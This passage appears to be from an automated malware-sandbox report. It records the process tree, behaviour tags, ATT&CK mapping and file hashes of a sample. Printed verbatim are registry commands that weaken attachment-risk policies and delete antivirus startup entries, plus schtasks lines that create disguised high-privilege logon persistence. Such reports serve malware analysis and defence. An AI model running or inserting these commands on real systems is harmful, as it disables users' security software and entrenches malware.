"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
6⤵
PID:3832

C:\Users\Admin\AppData\Local\Temp\E556.exe
C:\Users\Admin\AppData\Local\Temp\E556.exe
1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\reviewbrokercrtCommon\kB5VrhbV.vbe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\reviewbrokercrtCommon\94dfcaErtMmvX.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
"C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9rapgWJBAQ.bat"
5⤵
PID:3168

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:1856

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:628

C:\Windows\System32\msaudite\dwm.exe
"C:\Windows\System32\msaudite\dwm.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Users\Admin\AppData\Local\Temp\E864.exe
C:\Users\Admin\AppData\Local\Temp\E864.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\cmd.exe
cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
2⤵
- Drops startup file
PID:1540

C:\Users\Admin\AppData\Local\Temp\EAC6.exe
C:\Users\Admin\AppData\Local\Temp\EAC6.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Users\Admin\AppData\Local\Temp\EAC6.exe
C:\Users\Admin\AppData\Local\Temp\EAC6.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 1468
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Users\Admin\AppData\Local\Temp\F97D.exe
C:\Users\Admin\AppData\Local\Temp\F97D.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Users\Admin\AppData\Local\Temp\FE6F.exe
C:\Users\Admin\AppData\Local\Temp\FE6F.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2172

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1628

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:188

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3008

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1256

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2220

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Documents and Settings\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\MPG4DECD\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4052

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\msaudite\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Boot\et-EE\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "reviewbrokercrtCommonsessionperfDll" /sc ONLOGON /tr "'C:\reviewbrokercrtCommon\kB5VrhbV\reviewbrokercrtCommonsessionperfDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3880

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3292

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1500

C:\Users\Admin\AppData\Roaming\vusafjc
C:\Users\Admin\AppData\Roaming\vusafjc
1⤵
PID:4756

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
dddba20fdee4fda51e86435d90e306b4

SHA1
4801bc8daf8b4b0addd7661a9ab995da4b0e417e

SHA256
f27865f05269d487129befb8e57b79bdd537f4fb35a8a7fa398a3c0c657370e0

SHA512
f0886d9991195a3d1ec61b3358b3af5ca680a0e7f747c4660e1dd2463c68abcc350aa2c7fd4eab1b3fcd85c447f30b9e831e8f3e1658305ca19290b061c15ee3

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
dddba20fdee4fda51e86435d90e306b4

SHA1
4801bc8daf8b4b0addd7661a9ab995da4b0e417e

SHA256
f27865f05269d487129befb8e57b79bdd537f4fb35a8a7fa398a3c0c657370e0

SHA512
f0886d9991195a3d1ec61b3358b3af5ca680a0e7f747c4660e1dd2463c68abcc350aa2c7fd4eab1b3fcd85c447f30b9e831e8f3e1658305ca19290b061c15ee3

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
bc4297189636ec7f2ed930e26d6b343c

SHA1
28b11653d857d872b308bb6453b266cc9fac340d

SHA256
5b0e183d4acc19af924b2a9715b35d81b32e8e68432289a4f4eddf8ae028fd82

SHA512
2fe26c8ab64c45bdbf923aa99029cb5e854f4f730a180d3ce664f94def73a0076903bea58bbbb7dd1f0f503159dad8af5796b8ac4a4519674a82e697d45515de

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
bc4297189636ec7f2ed930e26d6b343c

SHA1
28b11653d857d872b308bb6453b266cc9fac340d

SHA256
5b0e183d4acc19af924b2a9715b35d81b32e8e68432289a4f4eddf8ae028fd82

SHA512
2fe26c8ab64c45bdbf923aa99029cb5e854f4f730a180d3ce664f94def73a0076903bea58bbbb7dd1f0f503159dad8af5796b8ac4a4519674a82e697d45515de

Download Submit
C:\ProgramData\Runtimebroker_new.exe
MD5
bc4297189636ec7f2ed930e26d6b343c

SHA1
28b11653d857d872b308bb6453b266cc9fac340d

SHA256
5b0e183d4acc19af924b2a9715b35d81b32e8e68432289a4f4eddf8ae028fd82

SHA512
2fe26c8ab64c45bdbf923aa99029cb5e854f4f730a180d3ce664f94def73a0076903bea58bbbb7dd1f0f503159dad8af5796b8ac4a4519674a82e697d45515de

Download Submit
C:\ProgramData\Runtimebroker_new.exe
MD5
bc4297189636ec7f2ed930e26d6b343c

SHA1
28b11653d857d872b308bb6453b266cc9fac340d

SHA256
5b0e183d4acc19af924b2a9715b35d81b32e8e68432289a4f4eddf8ae028fd82

SHA512
2fe26c8ab64c45bdbf923aa99029cb5e854f4f730a180d3ce664f94def73a0076903bea58bbbb7dd1f0f503159dad8af5796b8ac4a4519674a82e697d45515de

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A8686E8496868D5EE505B030DC80226B
MD5
a93c11e22787e49e8030e7e47ec239c5

SHA1
123bcab64d49b9072adb87f5a5f8fdbda8522ec4

SHA256
e3a6c4eab02606dc367df99d990ca45d34325f03cd2b326bfe9626eb4616c291

SHA512
8e6bf73329dff8ebfc184be14b0ecf3360c1574bb3ec47fe29b72b073eb8fa4bd4df6efe7fa4ccef2e7ffb50d1c2b471458849bbb4dadfa500fb36ef9352063f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
d5ea9e7e930a68b6fd083c5279b61bc3

SHA1
287e528865d038f22d944fe8846d8da09e4f3030

SHA256
508f2226f6042efab64234f92b048b87736a63c568adb171cfe3f0dc486cb6b5

SHA512
1637df5db44bc1e9a91d5ffe41c1d517b1f33e7599542c397c2415da395b04ccbc77afc97d2a58c01fb25f37053f155ddcabaaa810e0e335b13f94eb03404aa1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A8686E8496868D5EE505B030DC80226B
MD5
fb9d58c047e20a1e2c1edab6004969a2

SHA1
b6c06a227f57fd33930333391f0f580e17af1fdd

SHA256
b599f2644eb625042fb995e0174f6200bef51af4ce9015210280f6f90858a2bc

SHA512
b3157680dcf7570d6840ac6905a9b1b82428a1dd7e967601e8439d70a2827b08f90384547ec806cfd9134ca0e2c9e30cfb4f8ee32d2274f89f060c1508902d6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
c558fdaa3884f969f1ec904ae7bbd991

SHA1
b4f85d04f6bf061a17f52c264c065b786cfd33ff

SHA256
3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

SHA512
6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f416abe0903651fb8576bb2ab6707b73

SHA1
0051cc061eaedbe74610b8bd2f0de449cc8b1662

SHA256
257485447a11a17af843e6bece1592391d37895e6c851fbda491a18515b6074c

SHA512
6ff73967be18662f6c9b1a6d62112c85f322cff2e752bcf828723a451cc536c96736afa868cd39356fff814ecad9cfe8b10a209214e1cfe56a634b12a5b97b4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5a4bbdf30f4a7cb713f0fddef1001b46

SHA1
a1210d7d1c2473a8bcc957bc5ffdfbd4c47d3da6

SHA256
a6b37ae211bde6bc8bf0ce55a7bc08cfbf67b9bc3632c469244cf3fe85987c83

SHA512
a292d6c81a05567577a15359199ba009a6f4a9c4669eae2e04ef89b23c90702970ef580db6bf45eee118144ab12985613ae16425b12a193c7a3fd4f0930e58f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\9rapgWJBAQ.bat
MD5
1548b187ab435d2cf80f30adcea83932

SHA1
fad5963e3a785e293f9022491392d72576707b54

SHA256
91585cece5b1542807b95a07dd678b7b7568fdb8cdb97d7bcc240730f6428baa

SHA512
23bf541fe858f7044506c8935ddf3c1b0eb221aa63a9826670e1efc20753367a7118fdbca3d47662d07898de4abcf50af626193f66ee45ddcc3098e12b6b417a

Download Submit
C:\Users\Admin\AppData\Local\Temp\E38F.exe
MD5
dddba20fdee4fda51e86435d90e306b4

SHA1
4801bc8daf8b4b0addd7661a9ab995da4b0e417e

SHA256
f27865f05269d487129befb8e57b79bdd537f4fb35a8a7fa398a3c0c657370e0

SHA512
f0886d9991195a3d1ec61b3358b3af5ca680a0e7f747c4660e1dd2463c68abcc350aa2c7fd4eab1b3fcd85c447f30b9e831e8f3e1658305ca19290b061c15ee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\E38F.exe
MD5
dddba20fdee4fda51e86435d90e306b4

SHA1
4801bc8daf8b4b0addd7661a9ab995da4b0e417e

SHA256
f27865f05269d487129befb8e57b79bdd537f4fb35a8a7fa398a3c0c657370e0

SHA512
f0886d9991195a3d1ec61b3358b3af5ca680a0e7f747c4660e1dd2463c68abcc350aa2c7fd4eab1b3fcd85c447f30b9e831e8f3e1658305ca19290b061c15ee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\E556.exe
MD5
6c5495906ddb50bedc2e331c424f8656

SHA1
ffea086f81d853fb73796af1f91c6af0c5ce5011

SHA256
9da59ca44258f50a20fc82517c9c8819af388dc7bb0932d58f275918121150ed

SHA512
ef8358d3d369c390d1bf80e06a229b35f7c7dc8f70c776ea87273ab4f7d81e724f61ec02c63b0312d4b5f6089e6f0ff3ba32307d8f2290fe88a853de0bce261d

Download Submit
C:\Users\Admin\AppData\Local\Temp\E556.exe
MD5
6c5495906ddb50bedc2e331c424f8656

SHA1
ffea086f81d853fb73796af1f91c6af0c5ce5011

SHA256
9da59ca44258f50a20fc82517c9c8819af388dc7bb0932d58f275918121150ed

SHA512
ef8358d3d369c390d1bf80e06a229b35f7c7dc8f70c776ea87273ab4f7d81e724f61ec02c63b0312d4b5f6089e6f0ff3ba32307d8f2290fe88a853de0bce261d

Download Submit
C:\Users\Admin\AppData\Local\Temp\E864.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\E864.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\EAC6.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\EAC6.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\EAC6.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\F97D.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\F97D.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE6F.exe
MD5
bc048d09d30ae0168067adf2f7a43b20

SHA1
ede229053e05741d1e0b9178883059754a58e9d1

SHA256
6bf6728a41edc74dd1c070f3f0ed9e4433efe96aa7440958e3d45d288a839c18

SHA512
d139b2d6e880ff6d9f57c519fb3581a21d3936a58dbff96d3fc4c45c948d47b6fc42db8f328dea498e96d543ebdfd2a6f613b75d8cd19cd2fd14fa31c10f3b48

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE6F.exe
MD5
bc048d09d30ae0168067adf2f7a43b20

SHA1
ede229053e05741d1e0b9178883059754a58e9d1

SHA256
6bf6728a41edc74dd1c070f3f0ed9e4433efe96aa7440958e3d45d288a839c18

SHA512
d139b2d6e880ff6d9f57c519fb3581a21d3936a58dbff96d3fc4c45c948d47b6fc42db8f328dea498e96d543ebdfd2a6f613b75d8cd19cd2fd14fa31c10f3b48

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat
MD5
49214cfef64a8f939b9ca639699ef380

SHA1
